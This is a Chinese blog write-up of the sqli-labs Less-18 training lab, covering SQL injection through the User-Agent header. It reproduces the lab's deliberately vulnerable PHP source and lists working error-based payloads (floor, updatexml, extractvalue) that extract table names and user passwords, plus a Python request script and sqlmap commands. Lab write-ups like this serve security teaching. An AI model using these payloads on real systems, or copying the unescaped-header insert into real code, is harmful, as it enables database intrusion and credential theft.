sqli-lab-less18

最新推荐文章于 2023-08-07 21:44:36 发布

Sa1nZen

最新推荐文章于 2023-08-07 21:44:36 发布

阅读量80

点赞数

分类专栏： sql注入文章标签：网络安全 sql web安全 mysql 数据库

本文链接：https://blog.csdn.net/Sa1nZen/article/details/132116169

版权

sql注入专栏收录该内容

27 篇文章 0 订阅

订阅专栏

sqli-lab-less18

一、靶标地址

Less-18 POST-Header Injection - Uagent field -Error based
#响应头Useragent注入
http://127.0.0.1/sqli/less-18/

二、漏洞探测

输入1 1
得到post数据包
uname=1&passwd=1&submit=Submit
#发现回显Your IP ADDRESS is 127.0.0.1

三、源码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
	
function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,20);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}



	$uagent = $_SERVER['HTTP_USER_AGENT'];
    #获取用户相关信息，包括用户浏览器、操作系统等信息。
	$IP = $_SERVER['REMOTE_ADDR'];
    #浏览网页的用户ip。
    #$_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。不能保证每个服务器都提供全部项目；服务器可能会忽略一些，或者提供一些没有在这里列举出来的项目
	echo "<br>";
	echo 'Your IP ADDRESS is: ' .$IP;
	echo "<br>";
	//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

	{
	$uname = check_input($_POST['uname']);#对uame和passwd都做了过滤
	$passwd = check_input($_POST['passwd']);
	
	/*
	echo 'Your Your User name:'. $uname;
	echo "<br>";
	echo 'Your Password:'. $passwd;
	echo "<br>";
	echo 'Your User Agent String:'. $uagent;
	echo "<br>";
	echo 'Your User Agent String:'. $IP;
	*/

	//logging the connection parameters to a file for analysis.	
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Agent:'.$uname."\n");
	
	fclose($fp);
	
	
	
	$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    #简化为select username,password from users where username=$uname and password=$passwd order by id desc limit 0,1;
    #desc为降序
	$result1 = mysql_query($sql);
	$row1 = mysql_fetch_array($result1);
		if($row1)#如果查询到，意味着这种方式也需要知道一个合法用户
			{
			echo '<font color= "#FFFF00" font size = 3 >';
			$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
            #向数据库security的uagents表插入三个字段值
			mysql_query($insert);
			//echo 'Your IP ADDRESS is: ' .$IP;
			echo "</font>";
			//echo "<br>";
			echo '<font color= "#0000ff" font size = 3 >';			
			echo 'Your User Agent is: ' .$uagent;//输出useragent
			echo "</font>";
			echo "<br>";
			print_r(mysql_error());		//否则语法执行失败打印错误，ip和uname都做了处理，只能在uagent上	
			echo "<br><br>";
			echo '<img src="../images/flag.jpg"  />';
			echo "<br>";
			
			}
		else
			{
			echo '<font color= "#0000ff" font size="3">';
			//echo "Try again looser";
			print_r(mysql_error());//打印错误
			echo "</br>";			
			echo "</br>";
			echo '<img src="../images/slap.jpg"   />';	
			echo "</font>";  
			}

	}

?>

四、黑盒与白盒测试

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

Postdata：
uname=admin&passwd=admin&submit=Submit
UserAgent：
1'
#Your User Agent is: 1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1', 'admin')' at line 1

Postdata：
uname=admin&passwd=admin&submit=Submit
UserAgent：
1')
Your User Agent is: 1')
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', '127.0.0.1', 'admin')' at line 1

Postdata：
uname=admin&passwd=admin&submit=Submit
UserAgent：
1'))
#Your User Agent is: 1'))
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')', '127.0.0.1', 'admin')' at line 1

猜测不出语句，只能知道会出现报错
在实际猜测中最好对' ') '))都进行测试

1、floor()函数报错
#获取数据库 用户 版本号
UserAgent：
1' and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#因为update语句无法使用union select，所以用and并将后面()

#获取表名
UserAgent：
1' and (select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '

#获取列名
UserAgent：
1' and (select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '

#获取用户名
UserAgent：
1' and (select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '

2、updatexml()函数报错
insert into uagents (`uagent`, `ip_address`, `username`) values ('$uagent', '$IP', $uname);

#获取数据库名
UserAgent：
1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '
#insert into uagents (`uagent`, `ip_address`, `username`) values ('1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '', 'a', 'b');
#后面是and'的原因是需要闭合前后两个引号，保证values后面的参数格式
#第一个参数是'1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and ''
select '1' and '2' and '3';
#1

#获取数据库名的第二种方式仅供参考
#补充一点：这里并不是URL而是HTTP头，所以+并不会被转义为(空格)，于是末尾的注释符号要变为#。
1' or updatexml(1,concat('#',(database())),0),' ',' ')#
1' and updatexml(1,concat('#',(database())),0),' ',' ')#
#这里是直接补充了value的两个空参数

#获取表名
UserAgent：
1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) and '

#获取列名
UserAgent：
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) and '

#获取列字段
UserAgent：
1' and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) and '

3、extractvalue()函数报错

#获取当期数据库名
UserAgent：
1' and extractvalue(1,concat(0x7e,(select database()))) and '

#获取表名
UserAgent：
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '

#获取列名
UserAgent：
' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) and '

#获取列字段
UserAgent：
1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) and '
UserAgent：
1' and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) and '

五、脚本撰写

import requests

url="http://192.168.128.159/sqli/less-18/index.php"
#F12查看或者burpsuite抓包
header={
        'User-Agent': "1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '",
        'Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload = {
        "uname" : "admin",
        "passwd" : "admin"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)

六、sqlmap

sqlmap -u "http://192.168.128.159/sqli/Less-18/" --data "uname=admin&passwd=admin&submit=Submit" --user-agent="" --level 4 --batch
#未探测出
#lever>=3才会去检查user-agent头是否存在注入漏洞

sqlmap -r target.txt --level 4 --batch
#未探测出

或者
sqlmap -r target.txt  --batch
#需要把User-Agent的值设置为*
#探测速度最快
Parameter: User-Agent #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ' AND (SELECT 2412 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(2412=2412,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xOtp'='xOtp

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ' AND (SELECT 6241 FROM (SELECT(SLEEP(5)))wmJd) AND 'IJbP'='IJbP

POST /sqli/less-18/ HTTP/1.1
Host: 192.168.128.159
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.128.159
Content-Type: application/x-www-form-urlencoded
User-Agent: *
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-18/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

uname=admin&passwd=admin&submit=Submit

七、总结

1、需要提前爆破一个合法用户
2、目前掌握的报错函数回显语句包括
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";